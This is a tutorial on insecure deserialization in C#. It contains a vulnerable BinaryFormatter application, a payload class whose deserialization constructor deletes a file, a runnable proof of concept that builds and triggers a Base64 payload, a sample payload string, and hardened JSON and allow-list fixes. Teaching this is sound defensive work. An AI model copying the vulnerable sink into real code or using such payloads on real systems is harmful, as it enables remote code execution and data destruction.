How security vulnerabilities can creep into C# code.

Example 1: The case of insecure deserialization

using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;

namespace VulnerableApp
{
    [Serializable]
    public class UserData
    {
        public string Username { get; set; }
        public string Password { get; set; }
    }

    class Program
    {
        static void Main(string[] args)
        {
            // Untrusted input: the entire serialized object graph comes from the user.
            Console.WriteLine("Enter serialized user data:");
            string serializedData = Console.ReadLine();

            byte[] data = Convert.FromBase64String(serializedData);
            UserData user = Deserialize(data);

            Console.WriteLine($"Welcome {user.Username}!");
        }

        // Vulnerable sink: BinaryFormatter instantiates whatever types the stream names,
        // so the input decides which code runs. The cast to UserData happens only after
        // the whole graph has been rebuilt and is no protection at all.
        static UserData Deserialize(byte[] data)
        {
            using (var memoryStream = new MemoryStream(data))
            {
                BinaryFormatter formatter = new BinaryFormatter();
                return (UserData)formatter.Deserialize(memoryStream);
            }
        }
    }
}

using System;
using System.IO;
using System.Runtime.Serialization;

[Serializable]
public class MaliciousPayload : ISerializable
{
    public MaliciousPayload() { }

    // BinaryFormatter skips ordinary constructors when rebuilding an object, but it
    // does call this ISerializable constructor, so the attacker's action lives here.
    protected MaliciousPayload(SerializationInfo info, StreamingContext context)
    {
        // Execute arbitrary code, e.g., delete files
        File.Delete("C:\\important_file.txt");
    }

    // Nothing to store: the type name in the stream alone is enough to trigger the constructor above.
    public void GetObjectData(SerializationInfo info, StreamingContext context) { }
}

How the code above can be exploited:

An attacker can craft serialized data that executes code when it is deserialized. BinaryFormatter trusts the type names embedded in the stream, so the input decides which classes are instantiated, and the formatter runs those classes' deserialization hooks (the ISerializable constructor, [OnDeserialized] methods, IDeserializationCallback.OnDeserialization) before the application ever sees the result. Note that BinaryFormatter does not call an ordinary parameterless constructor while rebuilding an object, so a working payload has to place its action in one of those hooks.

  • Create a malicious class whose deserialization-time code performs an unauthorized action (e.g., deletes files or executes shell commands).

  • Serialize an instance of the malicious class with BinaryFormatter and Base64-encode the bytes.

  • Supply this string to the application as input.

When the application deserializes the data, the payload runs; the subsequent cast to UserData then fails with an InvalidCastException, but by that point the damage is done. In practice the attacker's own class is not loadable on the target, so real attacks use "gadget chains": types that already exist in the .NET Framework or in loaded assemblies whose deserialization hooks can be chained into code execution (tools such as ysoserial.net generate such BinaryFormatter payloads).
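The three steps above, as an added end-to-end example that is not part of the original page. It assumes attacker and victim share one assembly (so the payload type resolves; real attacks use gadget-chain types that already exist on the target), writes a harmless marker file in the temp directory instead of the page's destructive File.Delete, and runs where BinaryFormatter is still enabled (.NET Framework 4.x or .NET 6/7; on .NET 8 or later the EnableUnsafeBinaryFormatterSerialization project property must be set to true). The names DeserializationDemo, BuildPayload and pwned.txt are this example's own.

```csharp
// Added example (not from the original page): the attacker builds a BinaryFormatter
// payload, the victim deserializes it, and the side effect fires before the cast fails.
using System;
using System.IO;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Formatters.Binary;

namespace DeserializationDemo
{
    [Serializable]
    public class UserData
    {
        public string Username { get; set; }
        public string Password { get; set; }
    }

    // Step 1: a class whose code runs during deserialization. BinaryFormatter never
    // calls a parameterless constructor when rebuilding an object, but it does call
    // the ISerializable deserialization constructor, so the action goes there.
    [Serializable]
    public class MaliciousPayload : ISerializable
    {
        public static readonly string Marker = Path.Combine(Path.GetTempPath(), "pwned.txt");

        public MaliciousPayload() { }

        // Invoked by BinaryFormatter on the receiving side.
        protected MaliciousPayload(SerializationInfo info, StreamingContext context)
        {
            // Stand-in for the attacker's action (File.Delete, Process.Start, ...):
            // drop a marker file so the effect is observable but harmless.
            File.WriteAllText(Marker, "deserialization ran attacker code");
        }

        // Nothing needs to be stored; the type name alone triggers the constructor.
        public void GetObjectData(SerializationInfo info, StreamingContext context) { }
    }

    class Program
    {
        // Step 2: attacker side. Serialize the payload and Base64-encode it.
        static string BuildPayload()
        {
            using (var ms = new MemoryStream())
            {
                new BinaryFormatter().Serialize(ms, new MaliciousPayload());
                return Convert.ToBase64String(ms.ToArray());
            }
        }

        // The page's vulnerable method, unchanged.
        static UserData Deserialize(byte[] data)
        {
            using (var ms = new MemoryStream(data))
            {
                return (UserData)new BinaryFormatter().Deserialize(ms);
            }
        }

        static void Main()
        {
            File.Delete(MaliciousPayload.Marker);   // no-op if absent

            string base64 = BuildPayload();
            Console.WriteLine("Payload: " + base64);

            // Step 3: the victim consumes the attacker's string.
            try
            {
                Deserialize(Convert.FromBase64String(base64));
            }
            catch (InvalidCastException)
            {
                // The cast to UserData fails only after the object graph has been
                // rebuilt; the attacker's constructor has already executed.
                Console.WriteLine("Cast failed, marker file exists: " + File.Exists(MaliciousPayload.Marker));
            }
        }
    }
}
```

Running it prints the Base64 payload, then reports that the cast failed while the marker file exists: the cast to UserData protected nothing, because the deserialization constructor ran while BinaryFormatter was still rebuilding the graph. The first characters of the printed payload are AAEAAAD/////, the BinaryFormatter stream header.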


For example, with the code structure above, assume an attacker sends a serialized payload as a Base64 string such as the following (the page's sample is illustrative and truncated, but its first characters, AAEAAAD/////, decode to the stream header that every BinaryFormatter payload begins with):

AAEAAAD/////AQAAAAAAAAAMAgAAAFxNYWxpY2lvdXNQYXlsb2FkAAAAAAAAAAAAAAAAAAMBAAAACk1hbGljaW91c1BheWxvYWQCAAAACk1hbGljaW91cw==

The Base64 string above is the attacker's payload. When the application deserializes it, BinaryFormatter resolves the MaliciousPayload type named in the stream and runs that class's deserialization-time code, so the attacker's action is performed before the cast to UserData can fail. Below is the same application rewritten so that the input can no longer decide which types get constructed:

using System;
using System.Text.Json;

namespace SecureApp
{
    // No [Serializable] needed: System.Text.Json ignores it and never reads type names from input.
    public class UserData
    {
        public string Username { get; set; }
        public string Password { get; set; }
    }

    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("Enter serialized user data:");
            string serializedData = Console.ReadLine();

            try
            {
                byte[] data = Convert.FromBase64String(serializedData);
                UserData user = SafeDeserialize(data);
                Console.WriteLine($"Welcome {user.Username}!");
            }
            catch (FormatException)
            {
                Console.WriteLine("Input is not valid Base64.");
            }
            catch (JsonException)
            {
                Console.WriteLine("Invalid or unsafe data provided.");
            }
            catch (ArgumentException ex)
            {
                Console.WriteLine("Rejected: " + ex.Message);
            }
        }

        // Safe replacement for BinaryFormatter: the input is plain JSON carrying no type
        // information, so the only object the deserializer can ever construct is UserData.
        static UserData SafeDeserialize(byte[] data)
        {
            const int MaxPayloadBytes = 4096;
            if (data.Length == 0 || data.Length > MaxPayloadBytes)
                throw new ArgumentException("payload size out of range");

            var options = new JsonSerializerOptions
            {
                PropertyNameCaseInsensitive = true,
                MaxDepth = 4   // a flat record needs no nesting; reject deeply nested input
            };
            UserData user = JsonSerializer.Deserialize<UserData>(data, options);

            // Strict validation of the fields the application actually uses.
            if (user == null || string.IsNullOrWhiteSpace(user.Username) || user.Username.Length > 64)
                throw new ArgumentException("username missing or out of range");

            return user;
        }
    }
}

The hardened version above fixes insecure deserialization by:

  • Replacing BinaryFormatter with a serializer that takes no type information from the input (e.g., System.Text.Json, or XML with strict schema validation), so the input can only populate the fields of the type the code asked for.

  • Validating the decoded data (size limits, required fields, field lengths) before acting on it.

  • Where a polymorphic serializer cannot be removed, allow-listing the specific types that may be instantiated and rejecting everything else (for BinaryFormatter this means a SerializationBinder that throws on unknown types). Treat this as a mitigation, not a fix: Microsoft's guidance is that BinaryFormatter cannot be made secure, and it is disabled by default in .NET 8 and later (and in ASP.NET Core since .NET 5).
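The allow-list bullet above, as an added example that is not code from the original page: a SerializationBinder that lets BinaryFormatter construct UserData and nothing else. It assumes a runtime where BinaryFormatter is still enabled (.NET Framework 4.x or .NET 6/7; .NET 8 and later need the EnableUnsafeBinaryFormatterSerialization project property) and uses a framework Hashtable as a stand-in for the root of a gadget chain. BinderDemo, UserDataOnlyBinder, RestrictedDeserialize and the sample values are names and data chosen here. The page's MaliciousPayload is refused the same way, since its type name is not UserData.

```csharp
// Added example (not from the original page): type allow-listing for BinaryFormatter.
using System;
using System.Collections;
using System.IO;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Formatters.Binary;

namespace BinderDemo
{
    [Serializable]
    public class UserData
    {
        public string Username { get; set; }
        public string Password { get; set; }
    }

    // Consulted for every class record in the stream before that type is instantiated.
    // It must THROW for anything not on the list: returning null tells BinaryFormatter
    // to fall back to its default, attacker-controlled type resolution.
    sealed class UserDataOnlyBinder : SerializationBinder
    {
        public override Type BindToType(string assemblyName, string typeName)
        {
            if (typeName == typeof(UserData).FullName)
                return typeof(UserData);

            throw new SerializationException(
                $"Type '{typeName}' from '{assemblyName}' is not on the allow-list.");
        }
    }

    class Program
    {
        // Constructed test input: serialize an arbitrary object graph to bytes.
        static byte[] Serialize(object graph)
        {
            using (var ms = new MemoryStream())
            {
                new BinaryFormatter().Serialize(ms, graph);
                return ms.ToArray();
            }
        }

        // Deserialize with the binder installed.
        static UserData RestrictedDeserialize(byte[] data)
        {
            using (var ms = new MemoryStream(data))
            {
                var formatter = new BinaryFormatter { Binder = new UserDataOnlyBinder() };
                return (UserData)formatter.Deserialize(ms);
            }
        }

        static void Main()
        {
            // The expected type is accepted.
            byte[] good = Serialize(new UserData { Username = "alice", Password = "x" });
            Console.WriteLine("Accepted: " + RestrictedDeserialize(good).Username);

            // Any other type, here a Hashtable standing in for a gadget-chain root,
            // is refused by the binder before an instance of it is ever created.
            byte[] other = Serialize(new Hashtable { { "k", "v" } });
            try
            {
                RestrictedDeserialize(other);
            }
            catch (SerializationException ex)
            {
                Console.WriteLine("Rejected: " + ex.Message);
            }
        }
    }
}
```

The binder throws rather than returning null because, for BinaryFormatter, a null from BindToType means "use default resolution" and silently reopens the hole. Even a strict binder only narrows the attack surface of a formatter Microsoft documents as unfixable, which is why replacing the format, as the SecureApp version does with JSON, is the real remedy and the binder is a stopgap for code that cannot yet be migrated.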
